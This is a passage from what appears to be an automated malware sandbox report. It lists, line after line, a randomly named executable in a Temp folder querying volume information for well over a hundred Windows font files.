Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
